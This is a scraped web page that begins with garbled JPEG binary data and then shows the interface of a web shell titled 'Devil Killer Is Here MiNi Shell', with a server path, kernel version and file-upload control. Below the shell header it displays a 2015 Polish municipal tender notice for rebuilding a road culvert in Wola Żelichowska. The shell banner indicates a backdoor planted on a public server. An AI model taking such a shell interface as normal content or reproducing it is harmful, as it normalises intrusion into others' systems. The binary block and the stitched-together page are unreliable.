JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150317/37459-N-2015.html

<p class="kh_header"><b>Gręboszów: Odbudowa przepustu w ciągu drogi gminnej dz. Nr 497 w miejscowości Wola Żelichowska w km 0+655</b><br>
<b>Numer ogłoszenia: 37459 - 2015; data zamieszczenia: 17.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.malopolska.pl/uggreboszow/Article/id,277574.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa przepustu w ciągu drogi gminnej dz. Nr 497 w miejscowości Wola Żelichowska w km 0+655.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest : Odbudowa przepustu w ciągu drogi gminnej 
dz. Nr 497 w miejscowości Wola Żelichowska w km 0+655.
2.	Zakres przedmiotu zamówienia obejmuje: 
1)	roboty pomiarowe przy tyczeniu przepustu:  szt. 1,
2)	rozbiórkę istniejącego przepustu 20 m3:  z rur PEHD 2xO 0,8 i betonowych 2xO1,0 m, o długości przepustu 6,3 m, 
     ścian  betonowych bocznych  o długości 5,50÷6,30 m, z odwiezieniem rur PEHD na miejsce wskazane przez 
     Inwestora,  gruzu na składowisko Wykonawcy, 
3)	roboty ziemne z transportem urobku na odległość do 1 km; wykop pod przepust:   203 m3,
4)	roboty ziemne; zasyp  gruntem kat. III zakupionym przez wykonawcę wraz  z jego  zagęszczaniem:   124 m3,
5)	wykonanie przepustu żelbetowego ramowego jednoprzęsłowego z podporami posadowionymi  na palach fundamentowych. Długość  przepustu  w przekroju poprzecznym 7,20 m,  długość w przekroju podłużnym  8,20 m. Światło poziome przepustu 6.80 m, światło pionowe przepustu 2,35 m. Pale pionowe  CFA O 60 cm szt 8 o długości
 po 6 m ,  łącznie długość 48 m z betonu  C30/37 (B37) - 13,56 m3. Ławy fundamentowe betonowe B10 (C8/10) - 8,5 m3. Konstrukcja betonowa  przepustu:  B37 (C30/37) -  46 m3, stal 6526 kg, deskowanie konstrukcji betonowej 126m2, 
6)	zabezpieczenia antykorozyjne konstrukcji przepustu:   49,20+49,00+15,44+23,80= 137,44  m2,
        7)   montaż barier ochronnych  stalowych  ze słupkami  zamocowanymi   w ścianach bocznych:   2x8,20m= 16,40 m,
   8)  wykonanie na przepuście nawierzchni tłuczniowej o grubości łącznej 30 cm  -   96,00  m2,
   9)  odtworzenie koryta  kanału.
  3.  W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany jest:
      1)  zapewnić  obsługę geodezyjną  inwestycji przez uprawnione służby geodezyjne obejmującej wytyczenie  
           i inwentaryzację powykonawczą obiektów,
      2)  wykonać oznakowania miejsca prowadzonych robót, i zabezpieczenia terenu na czas robót przed wstępem osób
           nie powołanych
      2)  protokolarnie przekazać wykonany przedmiot zamówienia  Zamawiającemu,
      3)  sporządzić  i przedłożyć dokumentacje odbiorową  (w 2 egz.),
      4)  udzielić Zamawiającemu   na wykonany przedmiot umowy co najmniej  60 miesięcy gwarancji  i odpowiedzialności 
           z tytułu rękojmi  za  jakość wykonania  przedmiotu  zamówienia .
      5)  przeprowadzić  przeglądy gwarancyjne celem prawidłowego funkcjonowania przedmiotowego przepustu. Przegląd 
           pierwszy funkcjonowania przepustu  Wykonawca przeprowadzi po 12 miesiącach  gwarancji,  a  ostatni  w ostatnim  
           deklarowanym miesiącu  gwarancji.  Przeglądy gwarancyjne prowadzone będą w obecności  przedstawiciela 
           Wykonawcy,  i przedstawiciela Zamawiającego.  Stwierdzone wady  Wykonawca usunie na własny koszt 
           w terminach  wskazanych  w protokołach  z wykonania przeglądu.
3.  Szczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa i specyfikacje techniczne wykonania
       i odbioru robót budowlanych (STWiORB), zawarte w  załączniku nr 12  do  niniejszej SIWZ, która jest dostępna
       w wersji elektronicznej na stronie internetowej Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.13.00-1, 45.24.40.00-9, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> .    Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 4 500,00 zł,  słownie:  cztery  
           tysiące pięćset  złotych, które winno być wniesione  przed upływem terminu składania ofert.
    2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
    3  Wadium wnoszone w pieniądzu należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto 
           Nr  33 9462 1013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej, Oddział Gręboszów 
           z dopiskiem Wadium do przetargu - Odbudowa przepustu w Woli Żelichowskiej.  
    4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium 
           na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
    5.  W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany  jest on 
           dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed upływem  terminu 
           składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat,  a do  oferty  dołączyć kopię 
           przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
           Wymagana ważność wadium w formach innych niż pieniężna  minimum - 30 dni od daty składania ofert.  Składane 
           przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej treści na przepis   art. 46 ust. 5 ustawy 
           Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego.  
    6.    Wniesienie wadium w innej, niż wyżej wskazanej formie zaskutkuje uznaniem iż oferta Wykonawcy nie jest właściwie  
           zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć takiego Wykonawcę  z postępowania na podstawie 
           art. 24 ust.2 pkt 2 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
        spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena  spełnienia 
        tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  na  zasadzie  spełnia /nie 
        spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (zakończył)  co najmniej jeden przepust ramowy lub most,  posadowiony 
        na palach fundamentowych, o wartości  robót,  nie mniejszej niż 150 tys. zł brutto,  i  który  został  wykonany 
        w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres  prowadzenia  działalności   jest  
        krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty  i miejsca wykonania oraz  załączeniem dowodów   
        dotyczących,  czy roboty te zostały wykonane   w sposób  należyty  oraz  wskazujących, czy  zostały   wykonane   
        zgodnie z zasadami sztuki budowlanej  i prawidłowo   ukończone.  
        Dowodami są poświadczenia lub inne  dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym  charakterze 
        wykonawca nie jest w stanie uzyskać  poświadczenia (wzór wykazu robót  - załącznik nr  4  do SIWZ).
                        Wartości robót podane w dokumentach w walutach innych niż wskazane przez Zamawiającego powinny przez     
Wykonawcę przeliczone według średniego kursu NBP na dzień przed złożeniem  ofert. Wykonawcy wspólnie     
                    ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/w  wymagania.
        Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę,  na  zasadzie  
        spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań  w zakresie spełniania tego warunku. Wykonawca potwierdza 
         spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 do SIWZ). Ocena 
         spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że dysponuje  lub dysponować będzie do realizacji zamówienia osobą, która będzie 
         pełnić funkcję kierownika budowy,   posiadającą  uprawnienia budowlane    do wykonywania samodzielnych 
         funkcji technicznych w budownictwie w specjalności konstrukcyjno budowlanej bez ograniczeń  lub w specjalności 
         mostowej,  wpisaną do właściwej    izby samorządu  zawodowego oraz  posiadającą aktualne ubezpieczenie 
         od   odpowiedzialności cywilnej.    
         Zamawiający,    określając wymogi dla  osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza 
         odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących 
         przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru  Gospodarczego
         oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy  Prawo budowlane (tekst  
         jednolity. Dz.U. z 2006 r. nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych  
         nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r.  nr 63, poz. 394). 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie wykazu osób, które będą uczestniczyć w wykonaniu 
         zamówienia. (wzór  - załącznik nr  5 do SIWZ) i złożenie oświadczenia, że osoby, które będą uczestniczyć 
         w wykonywaniu zamówienia posiadają wymagane uprawnienia (wzór - załącznik nr 6 do SIWZ).
         Ocena  spełnienia tego warunku zostanie dokonana na podstawie  dokumentów złożonych przez  Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia  w tym zakresie szczególnych wymagań,  w zakresie spełniania tego warunku. 
         Wykonawca potwierdza  spełnianie warunku poprzez złożenie oświadczenia  (wzór oświadczenia - załącznik nr  2 
         do SIWZ). Ocena  spełnienia tego warunku zostanie dokonana na podstawie oświadczenia złożonego  przez Wykonawcę,  
         na  zasadzie  spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że zrealizował (zakończył)  co najmniej jeden przepust ramowy lub most,  posadowiony 
        na palach fundamentowych, o wartości  robót,  nie mniejszej niż 150 tys. zł brutto,  i  który  został  wykonany 
        w okresie  ostatnich 5 lat przed  upływem terminu  składania   ofert,  a jeżeli okres  prowadzenia  działalności   jest  
        krótszy  -   w tym  okresie,  z podaniem  ich rodzaju  i wartości, daty  i miejsca wykonania oraz  załączeniem dowodów   
        dotyczących,  czy roboty te zostały wykonane   w sposób  należyty  oraz  wskazujących, czy  zostały   wykonane   
        zgodnie z zasadami sztuki budowlanej  i prawidłowo   ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>)  Formularz ofertowy (wzór -  załącznik nr 1 do SIWZ).
       2)  Kosztorys ofertowy (opis  sporządzenia w rozdziale  X SIWZ). 
       3)  Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo 
            do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku 
            gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru albo zaświadczenia o wpisie 
            do ewidencji działalności gospodarczej.
       4)  Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz w sposób określony 
            w rozdziale VIII pkt 5.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Termin wykonania zamówienia - 10.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana   treści   niniejszej   umowy   może nastąpić  wyłącznie w granicach unormowania art.144 ust.1 ustawy 
      Pzp na warunkach określonych w SIWZ za zgodą obu  stron wyrażoną na   piśmie.  
2.   Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  na podstawie której dokonano wyboru Wykonawcy, w przypadku:
      1) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu 
    zamówienia lub świadczenia Stron;
      2) zmiany terminu realizacji umowy;
          a) w przypadku wystąpienia okoliczności wynikających z siły wyższej (np. powodzie, huragany, gwałtowne burze 
        itp. warunki pogodowe), uniemożliwiające realizację robót. Wstrzymanie z tego powodu musi być potwierdzone
              w dzienniku budowy i zaakceptowane przez inspektora nadzoru,
          b) przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   niemożliwością prowadzenia 
              prac, np.: będące następstwem działania organów administracji,   wstrzymanie prac budowlanych  przez właściwy 
              organ, opóźnienia związane z uzyskiwaniem przez  Wykonawcę lub Zamawiającego  niezbędnych w myśl ustawy 
              Prawo budowlane dokumentów,
         c)   innymi okolicznościami nie powstałymi  z winy Wykonawcy lub koniecznością wykonania  dodatkowych 
               i niemożliwych do przewidzenia robót,
         W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania  umowy może  ulec 
         odpowiedniemu przedłużeniu o czas niezbędny do zakończenia przedmiotu zamówienia,  nie dłużej jednak niż o okres 
         trwania tych okoliczności.
3)   Zmiana sposobu spełniania świadczenia;
 a)  Zamawiający  dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności 
      wykonania robót zamiennych w stosunku do przewidzianych dokumentacja projektową, w sytuacji gdy 
      wykonanie tych robót będzie niezbędne dla prawidłowego, tj. zgodnego z zasadami wiedzy technicznej
      i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
 b)  Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej,  
       pod warunkiem, że zmiany te będą  korzystne  dla Zamawiającego. Będą to, przykładowo,  okoliczności:
      - powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatacje i konserwacje  wykonanego  
        przedmiotu umowy,
      - powodujące poprawienie parametrów technicznych,
      - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących  przepisów.
      Dodatkowo możliwa jest  zmiana producenta poszczególnych materiałów i urządzeń przedstawionych 
      w ofercie przetargowej, pod  warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych  materiałów
      lub urządzeń.
c)   Ustala się, że wszelkie roboty zamienne, dodatkowe,  będą wykonywane przy zachowaniu nie pogorszonych norm, 
       standardów   i parametrów,  a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia z tytułu  takich  
      zmian.
d)   Przewiduje się także możliwość ograniczenia zakresu rzeczowego przedmiotu umowy (roboty zaniechane),    
      w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy 
      technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy.
     
      W takim  przypadku  wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający 
      zapłaci za   wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen z przetargu, po przedłożeniu 
      zaakceptowanego kosztorysu  różnicowego.
